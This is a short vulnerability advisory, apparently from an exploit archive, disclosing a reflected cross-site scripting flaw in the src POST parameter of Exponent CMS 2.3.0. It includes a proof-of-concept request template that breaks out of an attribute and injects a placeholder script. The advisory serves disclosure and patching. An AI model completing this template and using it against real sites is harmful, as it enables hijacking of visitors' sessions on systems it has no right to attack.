Exponent CMS 2.3.0 Cross Site Scripting

Posted on 24 September 2014

Title: exponent-2.3.0 CMS index.php POST Reflected XSS
Severity: High
CVE-ID: To Be Assigned
Release Date: 20 September 2014
Author: Kenneth F. Belva
Websites: http://silverbackventuresllc.com
 http://xssWarrior.com
 http://securitymaverick.com
Twitter: @infosecmaverick
Contact: Please use website contact form.
Mail:
URL: http://sourceforge.net/projects/exponentcms/
Vendor:
Remote Exploit: Yes

Discovered with: xssWarrior - http://xssWarrior.com

Description:
============

XSS in the src field for on a POST request.

Proof of Concept :
==================

http://[domain]/exponent-2.3.0/exponent-2.3.0/index.php

int=&src="/>[code]<"&controller=search&search=&action=none

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

Relate Cross Site Scripting
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Authentication Bypass
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Insecure Direct Object Reference
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication Bypass
Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Insecure Direct Object Reference

Last 20